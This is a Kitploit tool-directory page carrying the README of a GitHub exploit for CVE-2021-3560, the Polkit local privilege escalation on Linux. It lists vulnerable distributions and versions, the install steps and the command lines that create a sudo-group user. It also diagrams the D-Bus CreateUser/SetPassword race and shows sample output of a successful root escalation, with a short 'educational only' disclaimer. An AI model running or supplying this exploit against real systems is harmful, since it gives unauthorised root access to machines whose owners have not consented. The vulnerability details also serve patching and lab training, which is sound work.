Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-3560_Polkit — Exploit for CVE-2021-3560 Polkit Local Privilege Escalation Vulnerability | Kitploit
Tools/GitHubGitHub/seimupve/cve-2021-3560_polkit
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary ExploitationLabs & Practice
GitHubseimupve/cve-2021-3560_polkit

CVE-2021-3560_Polkit

Exploit for CVE-2021-3560 Polkit Local Privilege Escalation Vulnerability

View Repository
711 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-3560 Polkit Local Privilege Escalation

        .--.  .-"     "-.  .--.
      / .. \/  .-. .-.  \/ .. \
     | |  '|  /   Y   \  |'  | |
     | \   \  \ 0 | 0 /  /   / |
      \ '- ,\.-"`` ``"-./, -' /
       `'-' /_   ^ ^   _\ '-'`
        .--'|  \._   _./  |'--.
      /`    \   \ `~` /   /    `\
     /       '._ '---' _.'       \
    /           '~---~'           \
   /                               \

An automated exploit for the CVE-2021-3560 vulnerability affecting PolicyKit (Polkit) on Linux systems.

⚠️ WARNING: This tool is intended for educational and cybersecurity training purposes only in a controlled lab environment. Unauthorized use of this exploit on systems you do not own is illegal.

📋 Table of Contents

  • About the Vulnerability
  • Vulnerable Systems
  • Features
  • Prerequisites
  • Installation
  • Usage
  • How It Works
  • Demonstration
  • Mitigation
  • References

🔍 About the Vulnerability

CVE-2021-3560 is a local race condition vulnerability in PolicyKit (polkit) that allows an unprivileged user to gain root privileges on vulnerable Linux systems.

Technical Details

  • CVE ID: CVE-2021-3560
  • Severity: High (CVSS 7.8)
  • Type: Race Condition / Time-of-Check Time-of-Use (TOCTOU)
  • Impact: Local Privilege Escalation (LPE)
  • Disclosure Date: June 2021

Affected Versions

The vulnerability affects two branches of Polkit with different version numbering:

Upstream (official versions)

  • Vulnerable: 0.113 to 0.118
  • Bug introduced: Commit bfa5036 (version 0.113)
  • Fixed: Version 0.119+

Debian/Ubuntu fork

  • Vulnerable: 0.105-26 and higher (up to 0.118)
  • Bug introduced: Commit f81d021 (version 0.105-26)
  • NOT vulnerable: Debian 10 "buster" (0.105-25)

💻 Vulnerable Systems

DistributionPolkit VersionVulnerable?
Ubuntu 20.040.105-26ubuntu1✅ Yes
Ubuntu 18.040.105-20❌ No
Debian testing "bullseye"0.105-31+✅ Yes
Debian 10 "buster"0.105-25❌ No
RHEL 80.115-11+✅ Yes
RHEL 7< 0.113❌ No
Fedora 21+0.113+✅ Yes
Fedora 20 and earlier< 0.113❌ No

📝 Note: Systems with security patches applied (e.g., ubuntu1.1, deb10u1) are not vulnerable.

✨ Features

  • ✅ Automatic detection of vulnerability across multiple distributions
  • ✅ Multi-OS support: Debian, Ubuntu, RHEL, CentOS, Fedora, Arch Linux
  • ✅ Dependency verification for required tools
  • ✅ Check mode: Verify vulnerability without exploitation
  • ✅ Adaptive timing: Automatic measurement of optimal race condition timing
  • ✅ Progress indicators: Real-time progress display
  • ✅ Colored output: Clear and easy-to-read interface
  • ✅ Robust error handling: Explicit messages on failure

📦 Prerequisites

Python Version

  • Python 3.6+ (compatible with older systems like CentOS 8)

System Dependencies

The exploit requires the following tools (automatically verified):

- dbus-send      # To communicate with D-Bus
- pkexec         # Part of PolicyKit
- id             # To verify user creation
- openssl        # To generate password hash

Required Service

- accountsservice  # Must be installed and active

🚀 Installation

# Clone the repository (or download the file)
git clone https://github.com/[your-repo]/CVE-2021-3560_Polkit.git
cd CVE-2021-3560_Polkit

# Make the script executable
chmod +x CVE-2021-3560_Polkit.py

📖 Usage

Mode 1: Vulnerability Check (--check)

Check if the system is vulnerable without running the exploit:

python3 CVE-2021-3560_Polkit.py --check

Example output:

[*] ============================================================
[*] CVE-2021-3560 Polkit Vulnerability Checker
[*] ============================================================
[*] Detecting operating system...
[+] OS: Ubuntu 20.04
[*] Checking required dependencies...
[+] Found: dbus-send
[+] Found: pkexec
[+] Found: id
[+] Found: openssl
[*] Detecting Polkit version...
[+] Polkit version: 0.105-26ubuntu1
[+] ============================================================
[+] SYSTEM APPEARS VULNERABLE!
[+] ============================================================
[*] Debian/Ubuntu fork detected (vulnerable since 0.105-26)

Mode 2: Exploitation

Create a privileged user:

python3 CVE-2021-3560_Polkit.py -u <username> -p <password>

Example:

python3 CVE-2021-3560_Polkit.py -u hacker -p Password123!

Complete Options

usage: CVE-2021-3560_Polkit.py [-h] [-u USERNAME] [-p PASSWORD] [-c]

options:
  -h, --help            Show help
  -u, --username        Username to create
  -p, --password        Password for new user
  -c, --check           Check vulnerability without exploiting

⚙️ How It Works

The exploit exploits a race condition in PolicyKit during D-Bus request processing.

Vulnerability Principle

  1. D-Bus Request: The user sends a D-Bus request to create a user
  2. Authorization Check: Polkit verifies if the user has permissions
  3. Race Condition: If the D-Bus connection is closed during verification, Polkit treats the UID as 0 (root)
  4. User Creation: The user is created with elevated privileges

Exploit Steps

┌─────────────────────────────────────────────────────────┐
│ 1. Optimal timing measurement                          │
│    └─> Test execution to calibrate timing              │
├─────────────────────────────────────────────────────────┤
│ 2. Exploitation: User creation                         │
│    └─> Send D-Bus CreateUser request                   │
│    └─> Kill process at precise moment (race condition) │
│    └─> Verify if user created                          │
├─────────────────────────────────────────────────────────┤
│ 3. Password hash generation                            │
│    └─> Using openssl passwd -6                         │
├─────────────────────────────────────────────────────────┤
│ 4. Exploitation: Password setting                      │
│    └─> Send D-Bus SetPassword request                  │
│    └─> Kill process at precise moment (race condition) │
│    └─> Test login with password                        │
├─────────────────────────────────────────────────────────┤
│ 5. Privilege escalation                                │
│    └─> Login with created account                      │
│    └─> Use sudo if member of sudo group                │
└─────────────────────────────────────────────────────────┘

🎬 Demonstration

Typical Exploitation Scenario

# 1. Check vulnerability
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py --check
[+] SYSTEM APPEARS VULNERABLE!

# 2. Launch exploit
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py -u pwned -p Pwn3d123!

╔═══════════════════════════════════════════════════════════╗
║       CVE-2021-3560 Polkit Privilege Escalation          ║
╚═══════════════════════════════════════════════════════════╝

[*] Creating user 'pwned' using race condition timing attack...
[*] Measuring command execution time...
[*] Command takes ~0.045s, using 0.023s timing
[*] Attempting race condition exploit, please wait...
[+] User 'pwned' created successfully! UID: 1001
[*] User is member of groups: 1001(pwned) 27(sudo)
[*] Generating password hash...
[+] Password hash generated
[*] Setting password for user 'pwned'...
[+] Password set successfully!
Download Tool